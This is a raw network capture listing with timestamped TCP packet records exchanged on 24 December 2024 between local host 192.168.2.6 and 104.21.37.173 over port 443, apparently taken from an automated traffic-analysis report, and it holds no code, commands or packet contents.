                                                                      Dec 24, 2024 08:29:15.439409971 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.439425945 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.441811085 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.441884995 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.441900015 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.447026014 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.447060108 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.447098017 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.447112083 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.447149038 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.448318958 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.448529005 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.448544025 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.449275970 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.449383020 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.449402094 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.451883078 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.452059031 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.452075958 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.498688936 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.498723030 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.498809099 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.498809099 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.498828888 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.521342993 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.521373987 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.521409988 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.521426916 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.521675110 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.609680891 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.609733105 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.609778881 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.609796047 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.609828949 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.614758968 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.614789009 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.614880085 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.614880085 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.614912033 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.618221045 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.618257046 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.618412018 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.618431091 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.620039940 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.620176077 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.620192051 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.620836973 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.620847940 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.620862961 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.622698069 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.622911930 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.622941017 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.624555111 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.625346899 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.625540018 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.626211882 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.626318932 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.627980947 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.628127098 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.630603075 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.630785942 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.633542061 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.633771896 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.634254932 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.634360075 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.636759043 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.636831999 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.638955116 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.639142036 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.639832020 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.639903069 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.641844034 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.641910076 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.644396067 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.644473076 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.689304113 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.689404964 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.711745024 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.711843967 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.712738037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.712816000 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.713696003 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.713764906 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.800554037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.800641060 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.801695108 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.801762104 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.802567959 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.802625895 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.807043076 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.807094097 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.807142973 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.807167053 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.807199955 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.808078051 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.810457945 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.810547113 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.813111067 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.813182116 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.814120054 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.814191103 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.817512989 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.817590952 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.817608118 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.818506956 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.818569899 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.818586111 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.819425106 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.819479942 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.819494963 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.820158005 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.824804068 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.824836969 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.824882984 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.824898005 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.824930906 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.824949026 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.825633049 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.825695038 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.830847025 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.830879927 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.830923080 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.830938101 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.830962896 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.830981016 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.832257032 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.832334995 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.836757898 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.836821079 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.836865902 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.836899996 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.836925983 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.836973906 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.837546110 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.837620020 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.903810024 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.903886080 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.903920889 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.903986931 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.904023886 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.904051065 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.904071093 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.904084921 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.904141903 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.907484055 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.907565117 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.993140936 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.993194103 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.993247032 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.993264914 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.993352890 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.996469021 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.996548891 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.996562004 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.999092102 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.999162912 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:15.999175072 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:15.999238014 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.003623009 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.003676891 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.003727913 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.003741026 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.003771067 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.004489899 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.008331060 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.008343935 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.010831118 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.010886908 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.010935068 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.010950089 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.010984898 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.016771078 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.016814947 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.016868114 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.016881943 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.016910076 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.023021936 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.023072004 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.023118019 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.023130894 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.023168087 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.028846025 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.028888941 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.028948069 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.028960943 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.028995037 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.074438095 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.074495077 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.074542999 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.074567080 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.074713945 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.096098900 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.096193075 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.185225964 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.185302019 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.185347080 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.185362101 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.185403109 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.185403109 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.185421944 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.190968037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.191020012 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.191071033 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.191083908 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.191111088 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.193619967 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.193718910 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.193732023 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.197123051 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.197159052 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.197199106 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.197212934 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.197309971 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.199647903 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.199800014 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.202348948 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.202455997 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.208636999 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.208682060 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.208731890 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.208745003 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.208771944 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.213973999 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.214024067 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.214057922 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.214071035 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.214117050 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.216841936 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.216921091 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.216936111 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.216998100 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.221015930 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.221050024 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.221091986 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.221111059 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.221133947 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.266442060 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.288258076 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.288439989 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.288489103 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.288532972 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.288561106 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.288707972 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.290456057 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.290539980 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.290553093 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.344561100 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.377033949 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.377046108 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.377125025 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.377140999 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.378211975 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.378289938 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.378303051 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.378360987 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.383383989 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.383433104 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.383464098 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.383477926 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.383505106 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.384263992 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.384347916 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.384361029 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.387099028 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.387177944 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.387191057 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.389672041 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.389741898 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.389754057 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.393251896 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.393284082 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.393332005 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.393352985 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.393376112 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.399449110 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.399473906 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.399532080 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.399544954 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.399571896 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.400198936 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.400254965 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.400268078 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.406419992 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.406440020 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.406481981 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.406495094 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.406528950 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.412282944 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.412302971 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.412370920 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.412384987 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.412453890 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.413152933 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.413216114 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.458467960 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.458504915 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.458549023 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.458563089 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.458611965 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.486661911 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.486685038 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.486774921 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.486794949 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.486876011 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.569142103 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.569245100 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.572822094 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.572871923 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.572938919 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.572983980 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.573020935 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.573046923 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.574698925 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.574779987 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.580740929 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.580765963 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.580826044 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.580841064 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.580866098 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.580885887 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.585167885 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.585211992 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.585242033 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.585252047 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.585275888 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.586174011 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.586226940 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.586234093 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.590675116 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.590719938 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.590742111 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:16.590751886 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:16.590778112 CET49719443192.168.2.6104.21.37.173
